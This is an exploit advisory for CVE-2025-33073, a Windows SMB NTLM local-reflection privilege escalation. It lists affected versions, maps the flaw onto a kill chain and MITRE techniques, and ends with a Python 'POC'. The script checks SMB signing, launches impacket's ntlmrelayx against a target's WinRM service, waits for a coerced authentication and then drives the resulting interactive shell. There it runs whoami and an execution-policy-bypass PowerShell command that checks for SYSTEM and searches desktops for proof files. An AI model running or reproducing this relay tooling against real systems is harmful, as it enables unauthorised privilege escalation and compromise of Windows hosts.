=============================================================================================================================================
| # Title : Windows 11 V 24H2 SMB Local Privilege Escalation via NTLM Local Reflection
| # Author : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 147.0.1 (64 bits)
| # Vendor : System built-in component. No standalone download available.
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214224/ & CVE-2025-33073

[+] Summary :

CVE-2025-33073 is a Microsoft Windows SMB privilege escalation vulnerability that abuses local NTLM reflection
behaviour within the SMB stack. The vulnerability does not enable remote exploitation by itself, but it breaks key
security assumptions in post-compromise scenarios, especially those involving NTLM authentication and SMB Signing.

In affected Windows versions, an attacker who already has local code execution or an authenticated foothold can
trigger SMB loopback authentication in a way that reflects the host's own NTLM credentials back to the same host,
potentially resulting in elevated privileges (up to SYSTEM).

This vulnerability is particularly dangerous because it can invalidate the protection normally provided by SMB
Signing, although only in a local context, which makes it highly relevant for post-exploitation, lateral movement
preparation and privilege escalation chains.

[+] Windows Versions Impacted by CVE-2025-33073 :

The vulnerability affects several client and server editions of Windows that were unpatched prior to Microsoft's
June 2025 security update.

Windows 10 Versions (before patch) :
  - Windows 10 Version 1507
  - Windows 10 Version 1607
  - Windows 10 Version 1809
  - Windows 10 Version 21H2
  - Windows 10 Version 22H2
[+] All with builds earlier than their respective patched builds listed by Microsoft.
Windows 11 Versions (before patch) :
  - Windows 11 Version 22H2
  - Windows 11 Version 23H2
  - Windows 11 Version 24H2
[+] Affected until the patched builds released in mid-2025.

Windows Server Editions (before patch) :
  - Windows Server 2008 (SP2 & R2 SP1)
  - Windows Server 2012 & 2012 R2
  - Windows Server 2016
  - Windows Server 2019
  - Windows Server 2022 (multiple branch builds)
  - Windows Server 2025 (24H2)
[+] All with builds lower than those patched by Microsoft in June 2025.

[+] Vulnerability Type : Privilege Escalation
[+] Component : Microsoft Windows SMB
[+] Attack Vector : Local / Same-host
[+] Authentication Required : Yes (local context)
[+] Remote Exploitation : No
[+] Post-Exploitation Impact : High

[+] Role in a Professional Kill Chain :

CVE-2025-33073 fits after initial access, not as an entry point:

  - Initial Access       : Phishing, credential theft, NTLM relay, or local code execution
  - Execution            : Attacker gains a user-level shell or service execution
  - Privilege Escalation : CVE-2025-33073 is leveraged here; NTLM local reflection enables elevation to SYSTEM
  - Credential Access    : High-privilege tokens and credentials become accessible
  - Lateral Movement     : Elevated access enables broader network compromise
  - Persistence / Impact : Durable control of the system or domain resources

The vulnerability amplifies existing access rather than creating it.

[+] MITRE ATT&CK Mapping :

  - Primary Techniques
      TA0004 - Privilege Escalation
      T1068  - Exploitation for Privilege Escalation
  - Secondary / Contextual Techniques
      TA0006 - Credential Access
      T1557  - Adversary-in-the-Middle (local / loopback context)
      TA0008 - Lateral Movement (indirectly enabled)

[+] Relationship to NTLM Relay :

  Aspect                          | Relation
  --------------------------------+---------
  Classic NTLM Relay (Network)    | No
  SMB Signing Bypass (Remote)     | No
  NTLM Local Reflection           | Yes
  Post-Auth Privilege Escalation  | Yes

[+] Key Insight : CVE-2025-33073 does not create NTLM Relay attacks, but it allows NTLM-based protections to be
bypassed locally, even when SMB Signing is enabled.
[+] Security Impact :
  - Undermines trust in SMB Signing within local contexts
  - Enables SYSTEM-level privilege escalation
  - Increases the blast radius of otherwise "contained" compromises

[+] Especially dangerous in :
  - Red-team post-exploitation
  - Breach escalation scenarios
  - Incident response cases where the initial foothold is underestimated

[+] Final Assessment :

CVE-2025-33073 is a force-multiplier vulnerability. On its own it is not an entry vector, but in the hands of an
attacker with limited access it can turn a foothold into full system compromise, making it a critical
post-exploitation risk in modern Windows environments.

[+] Usage : python poc.py

[+] POC :

import logging
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
from datetime import datetime
from queue import Queue, Empty

logger = logging.getLogger("Orchestrator")
if not logger.handlers:
    logger.setLevel(logging.INFO)

    class SafeFormatter(logging.Formatter):
        """Strip ANSI colour codes and non-printable characters before writing to the log file."""
        def format(self, record):
            msg = super().format(record)
            return re.sub(r'\x1b\[[0-9;]*m', '',
                          "".join(ch for ch in msg if ch.isprintable() or ch in "\n\r\t"))

    fh = logging.FileHandler(f"relay_orchestrator_{datetime.now().strftime('%m%d_%H%M%S')}.log")
    fh.setFormatter(SafeFormatter('%(asctime)s [%(levelname)s] %(message)s'))
    logger.addHandler(fh)
    ch = logging.StreamHandler()
    ch.setFormatter(logging.Formatter('%(message)s'))
    logger.addHandler(ch)


def log_info(msg):
    logger.info(f"\033[0;34m[*] {msg}\033[0m")


def log_success(msg):
    logger.info(f"\033[0;32m[+] {msg}\033[0m")


def log_err(msg):
    logger.error(f"\033[0;31m[x] {msg}\033[0m")


def check_smb_signing_native(target_ip):
    """Return True if the target requires SMB signing, False if it does not, None if the check failed."""
    log_info(f"Checking SMB Signing (Native): {target_ip}...")
    try:
        from impacket.smbconnection import SMBConnection
        # A bare SMB negotiate is enough to read the server's signing flags; no login is needed.
        smb = SMBConnection("*", target_ip, sess_port=445, timeout=5)
        is_required = smb.isSigningRequired()
        smb.close()
        return is_required
    except Exception as e:
        log_err(f"SMB Check failed (Port closed or host unreachable): {e}")
        return None


def post_exploit_analysis(port):
    """Talk to the interactive shell ntlmrelayx opened on localhost and run a few triage commands."""
    ps_payload = (
        # S-1-5-18 is the SYSTEM account SID; 'whoami /user' reports it, 'whoami /groups' does not.
        "$sid = whoami /user;"
        "if ($sid -match 'S-1-5-18') { 'STATUS: HIGH INTEGRITY (SYSTEM)' } else { 'STATUS: MEDIUM/LOW PRIVILEGE' };"
        "Get-ChildItem -Path 'C:\\Users\\*\\Desktop\\*' -Include '*flag*','proof.txt' -File -ErrorAction SilentlyContinue | % { $_.FullName }"
    )
    cmds = f"whoami & hostname\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"{ps_payload}\"\nexit\n"
    try:
        with socket.create_connection(("127.0.0.1", int(port)), timeout=10) as s:
            s.sendall(cmds.encode('utf-8'))
            s.settimeout(3)
            buffer = b""
            try:
                while True:
                    chunk = s.recv(8192)
                    if not chunk:
                        break
                    buffer += chunk
            except socket.timeout:
                pass
            # Windows tools may answer in UTF-16LE; fall back to UTF-8 otherwise.
            try:
                decoded = buffer.decode('utf-16le') if b'\x00' in buffer else buffer.decode('utf-8')
            except UnicodeDecodeError:
                decoded = buffer.decode('utf-8', errors='ignore')
            log_success(f"Session Analysis Results:\n{decoded.strip()}")
    except Exception as e:
        log_err(f"Failed to interact with session on port {port}: {e}")


def cleanup_process(proc):
    """Ensure clean termination of the relay process tree on Windows and Unix."""
    log_info("Cleaning up active processes...")
    try:
        if os.name == 'nt':
            subprocess.run(['taskkill', '/F', '/T', '/PID', str(proc.pid)], capture_output=True)
        else:
            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        proc.wait(timeout=5)
    except Exception:
        proc.kill()


def run_orchestrator(target_ip):
    """Start ntlmrelayx, wait for a coerced authentication and hand the resulting shell port to the analysis."""
    # ntlmrelayx prints the port of its interactive shell once a session is established; the exact wording
    # differs between impacket versions, so only "Started interactive ... 127.0.0.1:<port>" is matched.
    port_regex = re.compile(r"Started interactive .*?(?:127\.0\.0\.1|0\.0\.0\.0):(\d+)", re.I)
    # ntlmrelayx.py is installed by impacket as a script, not as a runnable module, so it is located on PATH
    # and started with the current interpreter (works on Windows as well as Unix).
    relay_script = shutil.which("ntlmrelayx.py") or "ntlmrelayx.py"
    relay_cmd = [sys.executable, relay_script, "-smb2support", "-t", f"winrms://{target_ip}", "-i"]
    kwargs = {'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP} if os.name == 'nt' else {'preexec_fn': os.setsid}
    try:
        proc = subprocess.Popen(relay_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                                text=True, bufsize=1, **kwargs)
        q = Queue()

        def enqueue_output(out, queue):
            try:
                for line in iter(out.readline, ''):
                    queue.put(line)
            except Exception:
                pass
            finally:
                out.close()

        t = threading.Thread(target=enqueue_output, args=(proc.stdout, q))
        t.daemon = True
        t.start()
        log_info(f"Orchestrator active.. waiting for forced NTLM auth for {target_ip}")
        start_time = time.time()
        while time.time() - start_time < 600:
            try:
                line = q.get_nowait()
                if any(x in line for x in ["Relaying", "Authenticating", "127.0.0.1"]):
                    print(f"\033[0;34m[RELAY]\033[0m {line.strip()}")
                match = port_regex.search(line)
                if match:
                    found_port = match.group(1)
                    log_success(f"Active session detected! Allocated Port: {found_port}")
                    post_exploit_analysis(found_port)
                    break
            except Empty:
                time.sleep(0.1)
            if proc.poll() is not None:
                break
        cleanup_process(proc)
        t.join(timeout=1)
    except Exception as e:
        log_err(f"Orchestrator management error: {e}")


def main():
    try:
        # Check for the impacket dependency before doing anything else
        import impacket  # noqa: F401
        print("\033[0;36m--- NTLM Relay Orchestrator (English Edition) ---\033[0m")
        target_ip = input("[>] Target IP: ").strip()
        if not re.match(r"^\d{1,3}(\.\d{1,3}){3}$", target_ip):
            log_err("Invalid IP format.")
            return
        signing_req = check_smb_signing_native(target_ip)
        if signing_req is True:
            log_err("SMB Signing is REQUIRED; Relay will likely fail (unless CVE-2025-33073 Local Reflection occurs).")
            if input("[!] Do you want to proceed anyway? (y/n): ").lower() != 'y':
                return
        elif signing_req is False:
            log_success("SMB Signing is NOT REQUIRED. Target is vulnerable to Relay.")
        run_orchestrator(target_ip)
    except KeyboardInterrupt:
        print("\n[*] Script aborted by user.")
        sys.exit(0)
    except ImportError:
        log_err("Impacket library missing. Install it via: pip install impacket")


if __name__ == "__main__":
    main()

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================